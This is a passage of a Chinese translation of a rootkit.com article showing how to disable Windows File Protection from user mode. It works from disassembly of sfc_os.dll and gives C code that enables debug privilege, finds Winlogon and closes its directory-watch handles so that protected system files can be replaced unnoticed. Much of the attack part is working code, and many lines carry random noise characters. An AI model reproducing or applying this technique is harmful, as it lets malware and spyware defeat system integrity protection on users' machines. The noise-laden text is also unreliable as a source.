Windows文件保护：如何斩断它飞翔的翅膀

韩冰

作者: Ntoskrnl[Germony]
. {  u' g9 A* C) }3 U( S翻译：时间风　　来自：幻影旅团http://www.ph4nt0m.org/
  `+ C: W  t' O! o0 V& @来源：_blank>http://www.rootkit.com/
$ ?8 y: k% i6 k* q  r7 ?原文：_blank>http://www.rootkit.com/newsread.php?newsid=212

+ |# S2 A, U7 V- l' H
; e  f/ e- z0 L6 I  h% ~  V正文：

在这篇文章中，我将为你展示如何废掉WFP,再不需要重起到安全模式或者是恢复控制台的情况下。是的，你听说过。
我会向你演示如何改变系统文件并不会让系统注意到并且替换到原文件。如果你不知道WFP是什么，可以在google中
搜索到：整个英特网都充斥着这样的文章。总之我能够保证并没有关于这个主题的文章。
" ]6 w3 k8 ~3 h8 W1 W
实际上，我过去并不想放出来这篇文章。主要因为我害怕它会帮助病毒和间谍软件也去这么做。当时，因为我写了相
关的代码并且马上给了某个人。改变我想法的是这个代码只会在你以管理员权限运行这个代码的时候才会起作用并且
这个程序以这个特权运行将会造成相当大的破坏。所以我认为这段代码不会造成很坏的影响。此外，系统文件保护如
8 A6 @$ G9 n7 d0 N8 O果按照这个方法和用这个代码执行将会过时。所以我认为发布的时候到了。XP-SP2已经发布没有影响WFP，这样意味
着这段代码的公布不会给任何人造成损坏（去使用这段代码或是相同的技术）。顺便说一句，欺骗WFP并不是什么难
6 Y- i! A+ t. x' ?* l3 s* V, q- G事，他只花费了我2个小时去完成了它。

3 ?& A" ^# ]* H7 W0 z首先，在我们编些什么之前，我们不得不来看看WFP是如何工作的。我不得不作这个去看看sfc_os.dll(sfc.dll如
果我们讨论的是Win2k)和Winlogon.exe（它是负责呼叫sfc.dll，当然了，去完成这个也是很简单的，亦仅仅需要
9 _3 t$ Z: W2 A) O4 c9 y) K一个进程查看器）没有必要反汇编，我只是说Winlogon引用sfc.dll，当然了我那时指的是sfc_os.dll（绝大多数
& [9 P( Y1 i, o1 R8 isfc.dll出口是向前的。当然我们讨论的是XP）这个函数是依次启动WFP，继续进入到sfc_os.dll序数1。是什么执
5 a1 T2 {0 x4 l1 _行这个函数呢？我过去通读了代码，那时我发现这个呼叫重新得到WFP的注册值得选择权，后来我看到许多事件填充，
突然我明白了

( e7 {# C: Z) k; T7 K: k代码如下：
- J& u% `7 X1 [' a; Y

* J! t% B+ W9 ]; ?% b' ~6 p( p.text:76C2B9ED push ebp
.text:76C2B9EE mov ebp, esp
0 h. S! B9 }. _1 i% V! g8 S' k.text:76C2B9F0 push ebx
.text:76C2B9F1 push esi
.text:76C2B9F2 mov esi, [ebp+arg_0]
8 _8 p2 R  D& I: x$ C7 [.text:76C2B9F5 mov eax, [esi+14h]
$ m3 d) B2 N" A" y4 G.text:76C2B9F8 xor ebx, ebx
0 Q2 p6 t5 R) G.text:76C2B9FA cmp eax, ebx
.text:76C2B9FC jz short loc_76C2BA1B
! f% r7 u" M) k. t+ B.text:76C2B9FE cmp [eax+134h], ebx
.text:76C2BA04 jz short loc_76C2BA1B
.text:76C2BA06 mov eax, [eax+138h]
.text:76C2BA0C and al, 1
.text:76C2BA0E dec al
.text:76C2BA10 neg al
4 a! W" k' |9 e* }.text:76C2BA12 sbb al, al
# U6 V$ e3 R4 |8 Y. W( `) W# M3 s' C# S.text:76C2BA14 inc al
.text:76C2BA16 mov byte ptr [ebp+arg_0], al
.text:76C2BA19 jmp short loc_76C2BA1E
" x# l8 k! @. f' {( }9 }2 J( b  J.text:76C2BA1B
.text:76C2BA1B loc_76C2BA1B:
! l! N4 P+ C) O.text:76C2BA1B
.text:76C2BA1B mov byte ptr [ebp+arg_0], bl
.text:76C2BA1E
.text:76C2BA1E loc_76C2BA1E:
.text:76C2BA1E
.text:76C2BA1E push [ebp+arg_0]
; z: J' b% h7 |1 j; w, O* _1 J% T2 c.text:76C2BA21 lea eax, [esi+8]
1 L6 }& ?0 p( S. z# j. w0 d.text:76C2BA24 push 0C5Bh
.text:76C2BA29 push 1000h
) ]: a" I8 w1 l9 l& u.text:76C2BA2E push dword ptr [esi+10h]
5 Q  a# |4 A* A  F" b( l. l.text:76C2BA31 push eax
.text:76C2BA32 push ebx
.text:76C2BA33 push ebx
.text:76C2BA34 push dword ptr [esi+4]
$ ~! |; n( Q# S2 ]6 d.text:76C2BA37 push dword ptr [esi]
5 g+ C9 s6 G* E4 o" s! m.text:76C2BA39 call ds:NtNotifyChangeDirectoryFile
.text:76C2BA3F cmp eax, ebx
.text:76C2BA41 jge short loc_76C2BA9A
.text:76C2BA43 cmp eax, 103h
- t1 Z/ u% D  l5 \7 m$ R3 C9 ^.text:76C2BA48 jnz short loc_76C2BA76
- a" H  u1 |1 p9 ?4 h.text:76C2BA4A push ebx
+ i1 W1 A+ r9 |- ~, b8 t.text:76C2BA4B push 1
5 ?! w- |0 ]# h! w- c.text:76C2BA4D push dword ptr [esi+4]
5 L& p# p6 Z# z.text:76C2BA50 call ds:NtWaitForSingleObject
.text:76C2BA56 cmp eax, ebx
.text:76C2BA58 jge short loc_76C2BA9A
4 z: s4 M4 J& K. O; C
3 j& f& e" J- @$ }; L; I( V$ K
" y% X; F! `& C) }$ i! F% e
我意识到WFP被以用户模式执行，仅仅是前后对照（一个多么残疾的保护）也许你不熟悉NtNotifyChangeDirectoryFile
/ I) d7 v" _' Q" m（NT确定改变目录文件）FindFirstChangeNotification（寻找首先改变的通告的本地函数）...让我们看看msdn文档：

"FindFirstChangeNotification函数创建一个改变通告句柄并且建立最初的改变通告过滤条件。一个等待通告句柄的成功
执行当一个改变发生和一个过滤条件相匹配的时候在特定的目录或者分支。然而，这个函数不需要改变满足这个等待条件。"
1 e; ?8 h5 V1 B! M
/ t# Y2 E/ i% J6 ]"这个等待函数能够监视特定目录或者子树通过使用FindFirstChangeNotification函数返回的句柄。一个等待满足这时候
一个过滤条件发生在监视目录或者子树
! N$ S5 g' L) ?! g# s4 }& e
在这个等候已经被满足之后，应用程序能够回应给条件并且继续监视目录通过呼叫FindNextChangeNotification函数和合适的等待函数"当句柄不在需要的时候，她能够使用FindCloseChangeNotification函数关闭。"

: j+ m+ d$ v- c! F+ N这个意味着什么呢？Winlogon的进程（通过sfc）监视每一个包含受保护文件的目录，实际上如果你用一个目标查看器调查进程（比如说基于sysinternals），你会看到一个句柄对于每一个受保护的目录。意味着我们只要关闭这些句柄用FindCloseChangeNotification或者CloseHandle去停止WFP监视系统目录。
. ~, \+ ?+ G0 `
好了，这里就是了：我们不能使WFP丧失能力从用户模式代码...cool，不是吗？不完全，事实上：如果这个工作不是那样简单会更好一些，我是说系统安全。
, \, Y: L6 u% B1 R- _: A
让我们开始编写：这个函数的句法，我是这样写的：

, w8 ~- X! H6 \  e0 ~void main()
{
$ h% U5 u. R) Wif (FuckWFPInTheAss() == TRUE)
{
, q* j# C* [& C+ |2 F" C/ ~// ok
}
else
{
0 S7 ^' n/ e( t. h// wrong
8 J# ~7 D3 `) l( {  X}
}
0 J) T, o. m, {/ J. o# c0 l, i
我认为非常简单的呼叫，让我们看看函数，首先我检查了我们运行的操作系统：

' ~: G. {  Y  S% U- e# m5 X7 z
  s  v8 o/ ~/ i/ [0 {: U8 v' |8 vosvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
- N) Q& V) T) i, n, o0 i- P
if (!GetVersionEx((OSVERSIONINFO *) &osvi))
{
osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);

if (!GetVersionEx ((OSVERSIONINFO *) &osvi))
9 g/ U( C2 y. I5 @return FALSE;
}
& u" g5 D! }6 O( d+ `7 w/ H8 X% g
0 t& u% M8 I9 f5 N' z; `  n) ^1 R
if (osvi.dwPlatformId != VER_PLATFORM_WIN32_NT ||
+ \& X, h: P- \& E# z9 uosvi.dwMajorVersion <= 4)
; f& B9 T  e6 j$ t: ]) Nreturn FALSE;

; F1 x  z% u6 Q' T0 ?

3 o6 l; t( A, t+ }如果我运行的不是NT的系统或者是基于4.0那时会返回失败（WTP被执行在Win2K以上）。然后我们需要一些函数他的地址是通过GetProcAddress得到：
7 w7 I7 V  V) s4 `5 T6 G. q$ j
3 i# G6 D, O, p# i0 E// ntdll functions
8 C9 n; e9 f, V
1 @) n+ S5 C# B/ m! s7 I( opNtQuerySystemInformation = (NTSTATUS (NTAPI *)(
; i3 X" i3 d! {- M( F% y7 g9 LSYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG))
GetProcAddress(hNtDll, "NtQuerySystemInformation");
8 s# v1 p" D% P6 Q
pNtQueryObject = (NTSTATUS (NTAPI *)(HANDLE,
OBJECT_INFORMATION_CLASS, PVOID, ULONG, PULONG))
GetProcAddress(hNtDll, "NtQueryObject");

// psapi functions
, U0 m: z2 o6 N4 [  {! r, X7 l
pEnumProcesses = (BOOL (WINAPI *)(DWORD *, DWORD, DWORD *))
GetProcAddress(hPsApi, "EnumProcesses");
# I+ b" C9 B& J& `+ _& \, C; _; P2 T% Q
( j3 c1 Z' ^6 t+ V" X8 ~, wpEnumProcessModules = (BOOL (WINAPI *)(HANDLE, HMODULE *,
: ^" i" X$ P  kDWORD, LPDWORD)) GetProcAddress(hPsApi, "EnumProcessModules");

" C, x0 P" p7 T% x& d# x7 hpGetModuleFileNameExW = (DWORD (WINAPI *)(HANDLE, HMODULE,
LPWSTR, DWORD)) GetProcAddress(hPsApi, "GetModuleFileNameExW");

% u8 D  H+ m. A- f# N3 P3 o4 ~& k6 gif (pNtQuerySystemInformation == NULL ||
8 w, d9 v. u, [3 k) A/ X( MpNtQueryObject == NULL ||
3 m/ g6 u6 Q$ G/ D2 k% G9 CpEnumProcesses == NULL ||
pEnumProcessModules == NULL ||
pGetModuleFileNameExW == NULL)
return FALSE;
9 ~. j6 M# S: @6 ~% i

# {) P5 Y" r) A一会我们看到为什么我需要这些函数。下一步是得到"SeDebugPrivileges" 调整标记权限（我们可以这么做只有我们以管理员权限运行应用进程）
$ t/ N0 X. ]5 D' b4 ~, g7 O: k( P
if (SetPrivileges() == FALSE)
0 d$ V0 x% I' t; h' P# b! Nreturn FALSE;


这里是这个函数：

' u1 [) {: Z' W; p% w! d/ [1 qBOOL SetPrivileges(VOID)
% V" o7 D/ r. g: r: e. C{
  R% o' L7 v- ^HANDLE hProc;
- K- R2 o( a. _- x2 J& E. Y) ILUID luid;
% f, ^2 H: M9 J, gTOKEN_PRIVILEGES tp;
HANDLE hToken;
: z5 ^1 w$ Z: @5 D% y1 M/ hTOKEN_PRIVILEGES oldtp;
- s& u) [) \% h- U  y+ D/ d# b: J  E- [DWORD dwSize;
- |$ F- N: Q5 j' v9 L0 h2 f* ^. T
hProc = GetCurrentProcess();

3 ~0 h% |& e$ Y& T6 Y& I9 m5 I6 n6 Eif (!OpenProcessToken(hProc, TOKEN_QUERY |
$ L9 ^; H7 i9 tTOKEN_ADJUST_PRIVILEGES, &hToken))
# N8 v  _. G* k7 \9 f, X$ ereturn FALSE;
. V, @$ ?$ H& M
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
9 ~6 Q( E% J9 E: i0 I* {* W( j{
CloseHandle (hToken);
- [5 _# e/ v! ureturn FALSE;
}

ZeroMemory (&tp, sizeof (tp));

/ c! l& M, f' v( Gtp.PrivilegeCount = 1;
3 \6 g# ]( M9 D3 dtp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES),
&oldtp, &dwSize))
{
/ u0 k8 b  R3 m) A( MCloseHandle(hToken);
return FALSE;
4 n, r1 M0 [0 e+ u2 M9 s2 Y7 P}

return TRUE;
1 H% d9 {: Y3 A. _0 j' _% O}

0 F% _7 ^+ d9 E3 ?# v
3 {0 B# ^  G& p6 R然后我必须取得Winlogon的进程ID，所以我们必须浏览所有进程找到Winlogon：
; A* P8 p% t2 K4 k9 F8 }
: m, b( \+ I. V: p// search winlogon
/ T1 D4 ]+ c0 a' I$ O
dwSize2 = 256 * sizeof(DWORD);

+ e% C+ f) A6 o- ]  Ydo
{
& C* G  U" u' q  v- t8 Z% bif (lpdwPIDs)
) @& P$ @2 W# j8 i, p{
HeapFree(GetProcessHeap(), 0, lpdwPIDs);
; q% s+ r- i& R7 I6 kdwSize2 *= 2;
( p8 z1 T9 G( ?" i# M2 e}

lpdwPIDs = (LPDWORD) HeapAlloc(GetProcessHeap(), 0, dwSize2);

% w9 L) S6 ]! |  ^" X4 }if (lpdwPIDs == NULL)
return FALSE;
( ~! Z3 J6 f. V6 Z9 u5 d
if (!pEnumProcesses(lpdwPIDs, dwSize2, &dwSize))
" S/ [6 R' t# [- y2 hreturn FALSE;
# X2 |) R, ]* S. W3 M; W- \
} while (dwSize == dwSize2);
6 v; `$ D. X0 T! J  R
dwSize /= sizeof(DWORD);
, q$ x& J7 a5 N- C
' S: H; k. z: C& k2 {+ b- ufor (dwIndex = 0; dwIndex < dwSize; dwIndex++)
( M' V$ y0 M7 t6 F# f{
# W, l3 c1 {' Q5 `( \8 _Buffer[0] = 0;
, T& F5 J- l4 F& u7 |# i) Q5 y, h
. v, z. X; T8 h' [$ X- L$ bhProcess = OpenProcess(PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ, FALSE, lpdwPIDs[dwIndex]);
  f* U- x9 h  p" V  D- p- n" V+ w
4 t1 |: x% [1 g5 s) ~if (hProcess != NULL)
{
* P8 ~3 I) e3 K, m5 yif (pEnumProcessModules(hProcess, &hMod,
5 s. y4 S4 S$ w# w  R* ~6 Fsizeof(hMod), &dwSize2))
9 m7 L% N& p7 j# B" T/ ]) l{
" Y" k: M6 b4 K  R: kif (!pGetModuleFileNameExW(hProcess, hMod,
Buffer, sizeof(Buffer)))
{
CloseHandle(hProcess);
continue;
, ^7 d! E$ X) H" ]}
( l/ Z/ i# Q7 |. L" T}
! U2 V5 d, \' P; G0 }- lelse
: p1 q) ]9 ~* t- ]4 a) q( H" G{
& h/ u" g; E3 \CloseHandle(hProcess);
continue;
}
4 O6 H$ q* I, M3 P3 Z
/ ^9 i9 t- B" ]. L2 V7 Hif (Buffer[0] != 0)
{
- j9 ?$ L  o8 m0 @$ K, @4 I5 rGetFileName(Buffer);

& R: K/ X0 j9 [; [' h4 Kif (CompareStringW(0, NORM_IGNORECASE,
2 v: E* B# q* v$ zBuffer, -1, WinLogon, -1) == CSTR_EQUAL)
{
1 V7 k' o: u2 f, V0 Q7 [, E' [0 p// winlogon process found
WinLogonId = lpdwPIDs[dwIndex];
& c+ ]( m( A/ d# U1 D% eCloseHandle(hProcess);
4 l# }! N: l7 P' F! n9 D9 [4 Rbreak;
' n. t9 u) Q4 B( f7 X  c; B}
6 Y" W3 r% q& [3 }4 C0 T8 `* ?5 Z$ I
dwLIndex++;
% K, \$ c* |, t& s* _" A}
) b% \; J7 y; w4 W9 G
CloseHandle(hProcess);
9 s% m8 y0 P% [$ p# z}

5 E( t7 a$ z2 z}
! V, @$ }3 T/ @7 K
9 ^5 \' _0 e" Q4 z" jif (lpdwPIDs)
HeapFree(GetProcessHeap(), 0, lpdwPIDs);

9 U8 G2 l( j% N! @5 y) L8 ?
/ F% B# g) s& H
- [$ ~4 L5 @: X+ ~7 f) W1 `% A: d现在我们有了进程ID，我们能够打开这个进程：
. v* ^7 Q: d$ k  ^/ R* W5 {
hWinLogon = OpenProcess(PROCESS_DUP_HANDLE, 0, WinLogonId);
$ a' Q2 y" i. f+ T. H
if (hWinLogon == NULL)
, q8 K. P! J, t3 {7 o% \{
return FALSE;
}

为什么我用PROCESS_DUP_HANDLE？那是什么呢？我们需要这个标记使用函数复制句柄（ZwDuplicateObject如果它听起来你很熟悉），我们会一会看到我们需要这个函数做什么。现在：

, B; W; f/ v1 l0 u3 S* J9 ?% P& n
" N; s" `3 G' l0 J% Hnt = pNtQuerySystemInformation(SystemHandleInformation, NULL, 0, &uSize);

while (nt == STATUS_INFO_LENGTH_MISMATCH)
4 K- B7 O; o5 S{
; h% C4 P) D3 X- }uSize += 0x1000;
3 `; R3 g- s3 V
if (pSystemHandleInfo)
VirtualFree(pSystemHandleInfo, 0, MEM_RELEASE);

8 l5 V" k7 c7 t( g1 o- e: g. ^. A2 BpSystemHandleInfo = (PSYSTEMHANDLEINFO) VirtualAlloc(NULL, uSize,
8 h/ o2 ?" U  ^3 i# wMEM_COMMIT, PAGE_READWRITE);
: E2 G) ?$ E2 |4 n2 u2 k2 l
1 ~5 t' j/ i* H" oif (pSystemHandleInfo == NULL)
) \, n- ?$ p8 L" e{
( |6 K# l* D1 KCloseHandle(hWinLogon);
, h8 K) z% K& _5 g$ Jreturn FALSE;
}
% i2 v( P7 H+ k, M* e: a' Q- e
nt = pNtQuerySystemInformation(SystemHandleInformation,
% ]: {/ ]: b/ d! {! {' z# UpSystemHandleInfo, uSize, &uBuff);
9 W* @& z+ Y8 E" \}

if (nt != STATUS_SUCCESS)
5 [6 K! O: j$ Z+ \{
VirtualFree(pSystemHandleInfo, 0, MEM_RELEASE);
- R( j+ ^4 M# f& B- D# nCloseHandle(hWinLogon);
4 X0 g9 [3 v1 w5 V8 y' _0 \return FALSE;
' Y9 Q3 G, I4 D$ @2 b}

0 b" K# `$ u7 p( k0 ]/ g# v* r这段代码重新获得所有的系统范围打开句柄，包括那些Winlogon进程。让我们看看下面的步骤：
3 `- S1 P& f$ g; P5 i, m# t# \- S; p
１）浏览所有打开的句柄检查那些属于Winlogon的
- z$ l9 j' |3 |+ a4 e: A4 S. O
: x# F4 {2 p1 z! P7 s２）复制每一个Winlogon句柄到我们的进程用DuplicateHandle，一会它会给我们权限去请求句柄／目标　名字用NtQueryObject。

３）如果这个目标名称是那些我们想要阻止监视目录中的一个，我们需要再次呼叫DuplicateHandle用DUPLICATE_CLOSE_SOURCE标记然后呼叫CloseHandle关闭damn句柄。

3 O1 a5 _+ j1 l+ t前两点不需要太多解释，但是第三点不得不在使之更加清晰一些，我们不得不关闭关闭这些句柄就是每一个系统目录我们想要更改文件进去的。而且，禁止WFP，我们不得不至少禁止System32目录的监视。这个目录的目标名称是例如：Harddisk00\\Windows\\System32；因为我懒得去转换harddiskxx成为我们常用的比如C，我写了情形－忽略函数向后比较字符串：